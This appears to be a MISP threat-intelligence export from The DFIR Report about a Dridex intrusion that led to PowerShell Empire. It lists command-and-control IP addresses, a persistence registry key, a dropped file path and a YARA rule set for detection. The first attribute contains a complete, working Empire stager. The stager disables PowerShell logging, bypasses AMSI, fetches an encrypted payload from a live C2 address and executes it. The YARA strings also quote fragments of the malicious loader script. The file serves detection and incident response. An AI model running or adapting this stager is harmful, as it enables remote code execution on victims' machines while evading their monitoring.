{
"Event": {
"analysis": "2",
"date": "2020-07-15",
"extends_uuid": "",
"info": "Dridex to Empire",
"publish_timestamp": "1596485147",
"published": true,
"threat_level_id": "3",
"timestamp": "1596485073",
"uuid": "946e7701-5bdd-4efe-ae94-a6626fc8092b",
"Orgc": {
"name": "The DFIR Report",
"uuid": "5e9e5d86-5b94-4ff6-b07e-4e3e950d210f"
},
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#10e874",
"name": "Powershell Empire"
},
{
"colour": "#0da700",
"name": "misp-galaxy:tool=\"Dridex\""
},
{
"colour": "#ffffff",
"name": "tlp:white"
}
],
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "PowerShell Empire HTTP stager (launcher one-liner). On PS >= 3 it zeroes the cached Group Policy ScriptBlockLogging settings and sets AmsiUtils.amsiInitFailed to bypass AMSI, disables TLS certificate validation (ServerCertificateValidationCallback = $true), sends a fixed IE11 User-Agent and the default proxy credentials, then downloads https://194.99.22.145:443/login/process.php with a hard-coded session cookie, RC4-decrypts it (staging key b6dc9515bf3161700de268130726d162, first 4 response bytes used as IV prepended to the key) and executes the result with IEX.",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594842943",
"to_ids": true,
"type": "text",
"uuid": "22da835e-04f1-4e3d-9125-3dbbe3cb7541",
"value": "If($PSVERSiOnTaBlE.PSVERsIOn.MajOr -Ge 3){$GPF=[reF].AsseMbLy.GETTYpe('System.Management.Automation.Utils').\"GETFiE`ld\"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GEtVaLuE($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[CoLLECtIONS.GeneRIC.DiCtIONArY[strING,SyStem.ObJeCT]]::nEW();$VAl.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB'+'lockLogging']=$vaL}ElsE{[ScrIpTBlock].\"GetFIe`ld\"('signatures','N'+'onPublic,Static').SETValUE($NUll,(NEw-ObJect COLlecTiONs.GEneRic.HASHSet[sTrInG]))}[Ref].AsSEMbLy.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIelD('amsiInitFailed','NonPublic,Static').SETVAlue($null,$TRUe)};};[SYsTEM.NET.SerVIcEPoIntMaNAger]::ExPECt100CONTinuE=0;$Wc=New-ObJecT SYSTem.NET.WeBClIent;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeAdERs.ADD('User-Agent',$u);$WC.PrOXY=[SYsTEm.NET.WebREQuEst]::DeFaULTWeBProxY;$WC.PROxy.CrEDENtiAls = [SYSTeM.NeT.CREDENTIALCaChe]::DeFAULTNetWORkCREdenTialS;$Script:Proxy = $wc.Proxy;$K=[SYstEm.TExT.ENCOdiNG]::ASCII.GeTBYTES('b6dc9515bf3161700de268130726d162');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOR$S[($S[$I]+$S[$H])%256]}};$ser='https://194.99.22.145:443';$t='/login/process.php';$wC.HeADerS.ADD(\"Cookie\",\"session=TI47O5rucSxxojlrBjwysXKBrRQ=\");$DATA=$WC.DOWnLOADDatA($seR+$t);$iV=$daTA[0..3];$DATa=$daTA[4..$DaTA.LenGTh];-join[Char[]](& $R $DAta ($IV+$K))|IEX"
},
{
"category": "Network activity",
"comment": "Empire staging/C2 host taken from the stager script in this event: https://194.99.22.145:443/login/process.php",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594845135",
"to_ids": true,
"type": "ip-dst",
"uuid": "39f56fa9-58f9-4962-a4e9-809182990f7d",
"value": "194.99.22.145",
"Tag": [
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
},
{
"colour": "#10e874",
"name": "Powershell Empire"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594845114",
"to_ids": true,
"type": "ip-dst",
"uuid": "acb0c1a9-45b9-4442-986b-d10c0b5808af",
"value": "64.118.8.15",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594845109",
"to_ids": true,
"type": "ip-dst",
"uuid": "2b113678-6c5c-4f92-b747-5fcd46fb9268",
"value": "59.148.253.194",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Persistence mechanism",
"comment": "Run-key persistence. The value embeds the victim user's SID (S-1-5-21-...-12106), which is host-specific, and the value name (Zvhlxdonjwfvei) may itself be per-infection; when turning this into a detection, match on the CurrentVersion/Run value name or the dropped executable rather than the full HKEY_USERS path.",
"deleted": false,
"disable_correlation": false,
"timestamp": "1595298092",
"to_ids": true,
"type": "regkey",
"uuid": "ef331607-0a3d-4770-b9da-33708b3e1a10",
"value": "\\HKEY_USERS\\S-1-5-21-1761595937-4212512506-1431507687-12106\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Zvhlxdonjwfvei"
},
{
"category": "Payload installation",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1595298165",
"to_ids": true,
"type": "filename",
"uuid": "6593e1cf-db14-4c4d-a5e5-cda4d9e252e3",
"value": "%APPDATA%\\Microsoft\\SystemCertificates\\My\\CRLs\\swET\\bdechangepin.exe"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417742",
"to_ids": true,
"type": "ip-dst",
"uuid": "f9f88e60-774a-47dc-bbcc-09818cbf07a0",
"value": "2.58.16.87",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417742",
"to_ids": true,
"type": "ip-dst",
"uuid": "587aa626-f57e-444e-b1c1-ab3491f99a10",
"value": "144.168.239.42",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417741",
"to_ids": true,
"type": "ip-dst",
"uuid": "3bbfd758-3b04-47ca-80c6-04566cd9f0e2",
"value": "216.52.109.40",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417741",
"to_ids": true,
"type": "ip-dst",
"uuid": "da8a693e-6e63-4de8-a1ef-ef863052adb1",
"value": "88.129.221.43",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417741",
"to_ids": true,
"type": "ip-dst",
"uuid": "65837ca9-0bf6-4c22-92a4-72fde36d2cd4",
"value": "104.131.103.128",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417740",
"to_ids": true,
"type": "ip-dst",
"uuid": "cad4c1c8-ad81-4869-841d-fc5b5176d8d6",
"value": "54.39.34.24",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417740",
"to_ids": true,
"type": "ip-dst",
"uuid": "64479ecc-ab45-495c-875d-42a2b7b2ce92",
"value": "192.99.103.228",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417740",
"to_ids": true,
"type": "ip-dst",
"uuid": "c176ce15-acd2-4573-9991-8e19d4953c4f",
"value": "2.80.178.251",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417619",
"to_ids": true,
"type": "ip-dst",
"uuid": "e2ddf6c7-40b0-4a89-8751-7525d4693c30",
"value": "75.170.61.45",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596450057",
"to_ids": true,
"type": "ip-dst",
"uuid": "931290f5-12fd-493e-802f-4e9e132a6a0d",
"value": "199.66.90.63",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596450034",
"to_ids": true,
"type": "ip-dst",
"uuid": "80882b5d-a04b-4963-a324-e9778acbaec6",
"value": "88.129.223.244",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596450009",
"to_ids": true,
"type": "ip-dst",
"uuid": "f1d301b8-3592-499e-b1b5-06c2d8e952d3",
"value": "209.74.126.2",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Artifacts dropped",
"comment": "Review note: as exported, rule dridex_cannot_but_soft will not compile: $s5 and $s7 are empty strings (YARA rejects empty text strings; the original XML/script tags appear to have been stripped), and $s11 contains the illegal escape sequence \\T (most likely a lost backslash in %WINDIR%\\Temp). Remove or restore these strings before loading the rule set. The remaining rules parse as written; their conditions rely on pe.imphash()/pe.exports() OR 8 of the listed strings.",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596485073",
"to_ids": false,
"type": "yara",
"uuid": "984b5cd1-6311-49e9-b65f-d7c684bd28f6",
"value": "/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2020-07-29\r\n Identifier: dridex-yara\r\n Reference: https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\r\n*/\r\n\r\n/* Rule Set ----------------------------------------------------------------- */\r\n\r\nimport \"pe\"\r\n\r\nrule dridex_yara_ufo {\r\n meta:\r\n description = \"dridex-yara - file ufo.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a\"\r\n strings:\r\n $s1 = \"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"usersJRB\" fullword wide\r\n $s5 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s6 = \"2017,2uchannelsPYDudays\" fullword wide\r\n $s7 = \"torrespondedthanfshadow\" fullword wide\r\n $s8 = \"increasing.includeda7iexample,Hofgodzilla\" fullword wide\r\n $s9 = \"haveand2system-providedreleasenoneJgZtest,\" fullword wide\r\n $s10 = \"wsupport3voftenfromR\" fullword wide\r\n $s11 = \"tofwerentheFirefox.149simplerunstableqqinformation\" fullword wide\r\n $s12 = \"11.172.2.11\" fullword wide\r\n $s13 = \"Dinsettheir\" fullword wide\r\n $s14 = \"yofthe\" fullword wide\r\n $s15 = \"TLty2_J \" fullword ascii\r\n $s16 = \"CosZTX^&% \" fullword ascii\r\n $s17 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s18 = \"4vthethatfour-part\" fullword wide\r\n $s19 = \"GkaChrome\" fullword wide\r\n $s20 = \"L$<;D$<\" fullword ascii /* Goodware String - occured 1 times */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"e37c1c1a736faeeff7de27f075619f47\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_cannot_but_soft {\r\n meta:\r\n description = \"dridex-yara - file cannot_but_soft.xsl\"\r\n author = \"The DFIR Report\"\r\n reference = 
\"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6\"\r\n strings:\r\n $s1 = \"var a_couch_for = [\\\"love_is_by\\\",\\\"all_but_keep\\\",\\\"summons_i_th\\\",\\\"humanity_so_we\\\",\\\"thus_hath_fed\\\",\\\"and_stood_between\\\",\" wide\r\n $s2 = \"{var and_light_than = [\\\"tween_their_course\\\",\\\"ophelia_distracted\\\",\\\"marriage_and_both\\\",\\\"of_us_grant\\\",\\\"nor_eye_and\\\",\\\"hum\" wide\r\n $s3 = \"xmlns=\\\"http://www.w3.org/1999/XSL/Transform\\\" xmlns:ms=\\\"urn:schemas-microsoft-com:xslt\\\" \" fullword wide\r\n $s4 = \"while (among_a_father + then_this_be >= new Date().getTime()) {}}\" fullword wide\r\n $s5 = \"\" fullword wide\r\n $s6 = \"]]> \" fullword wide\r\n $s7 = \"\" fullword wide\r\n $s8 = \"{var among_a_father = new Date().getTime();\" fullword wide\r\n $s9 = \"it_so_mope(\\\"rundll32 \\\".concat(locks_to_all.concat(\\\" \\\".concat(\\\"DllRegisterServer\\\"))))\" fullword wide\r\n $s10 = \"xmlns:user=\\\"placeholder\\\" \" fullword wide\r\n $s11 = \"var locks_to_all = \\\"%WINDIR%\\Temp/\\\".concat(\\\"/\\\".concat(my_acquittance))\" fullword wide\r\n $s12 = \"{return leaves_in_his.readystate}\" fullword wide\r\n $s13 = \"function unproportion_d_no(leaves_in_his)\" fullword wide\r\n $s14 = \"run(for_s_purpose)}}\" fullword wide\r\n $s15 = \"version=\\\"1.0\\\">\" fullword wide\r\n $s16 = \"if(beast_so_as(call_it_an)=== 150+50 && unproportion_d_no(call_it_an) === 1+3)\" fullword wide\r\n $s17 = \"var lecture_and_polonius = \\\"wscript.\\\".concat(first_corse_again);\" fullword wide\r\n $s18 = \"with (now_it_profanely){\" fullword wide\r\n $s19 = \"{return of_his_solicitings.status}\" fullword wide\r\n $s20 = \"couplets_are_embark.close();\" fullword wide\r\n condition:\r\n uint16(0) == 0xfeff and filesize < 20KB and\r\n 8 of them\r\n}\r\n\r\n\r\nrule dridex_yara_marple {\r\n meta:\r\n description = 
\"dridex-yara - file marple.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"cb81e371e2a4d3371e051b1f15674ce6cb94e257d28ddc1a5209bb56c71dd27a\"\r\n strings:\r\n $s1 = \"vplD.dll\" fullword ascii\r\n $s2 = \"wtrter.dll\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"RRR333\" fullword ascii /* reversed goodware string '333RRR' */\r\n $s5 = \"nProtect KeyCrypt Program Database DLL\" fullword wide\r\n $s6 = \"VVV&&&\" fullword ascii /* reversed goodware string '&&&VVV' */\r\n $s7 = \"PPPPP$\" fullword ascii /* reversed goodware string '$PPPPP' */\r\n $s8 = \"LIO.pdb\" fullword ascii\r\n $s9 = \"0!\\\"!!!\" fullword ascii\r\n $s10 = \"3930, 00, 0, 0\" fullword wide /* hex encoded string '90' */\r\n $s11 = \"))44)44'7+4)?\" fullword ascii /* hex encoded string 'DDt' */\r\n $s12 = \"=22222222=\" fullword ascii /* hex encoded string '\"\"\"\"' */\r\n $s13 = \"44==========-\" fullword ascii /* hex encoded string 'D' */\r\n $s14 = \"7733.--!&\" fullword ascii /* hex encoded string 'w3' */\r\n $s15 = \"#44##' {\" fullword ascii /* hex encoded string 'D' */\r\n $s16 = \"doqdoqdoqdoqdoqdoqdoqdoqdoqdoqdoq\" fullword ascii\r\n $s17 = \"doqdoqdoqdoqdoqdoqdoqdoqdoqdoqdoqdoq\" fullword ascii\r\n $s18 = \"xwxwwwwwxwxwwwwwxwx\" fullword ascii\r\n $s19 = \"wxwxwwwwwxwxwwwwwxwx\" fullword ascii\r\n $s20 = \"doqdoqdoqdoq\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 1000KB and\r\n ( pe.imphash() == \"b575de8cf342823d87afbf497885b43d\" and pe.exports(\"pfrBpdm16\") or 8 of them )\r\n}\r\n\r\nrule dridex_yara_123 {\r\n meta:\r\n description = \"dridex-yara - file 123.bin\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"e88dfd4bef8c502ef2b711fd025aa321244dbca1eab80586b07187b3cf261de3\"\r\n strings:\r\n $s1 = 
\"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"sself.exe\" fullword wide\r\n $s4 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s5 = \"11.172.2.11\" fullword wide\r\n $s6 = \"a}d+ #\" fullword ascii\r\n $s7 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s8 = \"Vxkc*P,BNG\" fullword ascii\r\n $s9 = \"Fpreferences,betweenpreviouslyX\" fullword wide\r\n $s10 = \"anLK'mT\" fullword ascii\r\n $s11 = \"LoMo?w\" fullword ascii\r\n $s12 = \"FSxH0P;:J\" fullword ascii\r\n $s13 = \"-ATXg3\\\"\" fullword ascii\r\n $s14 = \"OofPNsPoint\" fullword wide\r\n $s15 = \"qrKn!6\" fullword ascii\r\n $s16 = \"BinN$L\" fullword ascii\r\n $s17 = \"thepwithZthebar\" fullword wide\r\n $s18 = \"NyRaG@g\" fullword ascii\r\n $s19 = \"HgWVIbD\" fullword ascii\r\n $s20 = \"'JZCnX;}p{\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"261439292fcce3e9d2f6f3cdfbf610b2\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_yara_rvhz1 {\r\n meta:\r\n description = \"dridex-yara - file rvhz1.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab\"\r\n strings:\r\n $s1 = \"c:\\\\Cover\\\\particular\\\\Mind\\\\Difficult\\\\engine\\\\Tool\\\\Under.pdb\" fullword ascii\r\n $s2 = \"constructor or from DllMain.\" fullword ascii\r\n $s3 = \"3.2.4.465\" fullword wide /* hex encoded string '2De' */\r\n $s4 = \"576=6_6}6\" fullword ascii /* hex encoded string 'Wff' */\r\n $s5 = \":*:1:G:\\\\:b:k:r:\" fullword ascii\r\n $s6 = \":Q:V:\\\\:z:\" fullword ascii\r\n $s7 = \"xzRamj6\" fullword ascii\r\n $s8 = \"VVtW;' \" fullword ascii\r\n $s9 = \"History Kill Few\" fullword wide\r\n $s10 = \" 1999-2017 History Kill Few, Inc.\" fullword wide\r\n $s11 = \"hExpY^f\" fullword ascii\r\n $s12 = \"<'<9